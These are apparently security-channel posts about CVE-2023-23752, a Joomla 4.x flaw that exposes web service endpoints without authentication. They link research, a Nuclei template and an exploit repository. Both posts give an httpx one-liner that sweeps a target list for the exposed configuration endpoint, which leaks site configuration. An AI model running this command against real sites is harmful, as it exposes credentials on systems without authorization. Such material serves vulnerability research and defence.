⚙️ Joomla Web Service Endpoint Access (CVE-2023-23752)
An issue was discovered in Joomla 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
PoC:
https://unsafe.sh/go-149780.html
Nuclei Template:
https://github.com/thecyberneh/nuclei-templatess/blob/main/cves/2023/CVE-2023-23752.yaml
#joomla #endpoint #access #cve
An issue was discovered in Joomla 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
PoC:
httpx -l targets.txt -sc -ct -ip -path '/api/index.php/v1/config/application?public=true'Research:
https://unsafe.sh/go-149780.html
Nuclei Template:
https://github.com/thecyberneh/nuclei-templatess/blob/main/cves/2023/CVE-2023-23752.yaml
#joomla #endpoint #access #cve
👍9
⚙️ Joomla < 4.2.8 — Unauthenticated Information Disclosure (CVE-2023-23752)
Research:
https://vulncheck.com/blog/joomla-for-rce
Exploit:
https://github.com/Acceis/exploit-CVE-2023-23752
UPD:
Research:
https://vulncheck.com/blog/joomla-for-rce
Exploit:
https://github.com/Acceis/exploit-CVE-2023-23752
UPD:
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'#joomla #information #disclosure #cve
🔥11👍1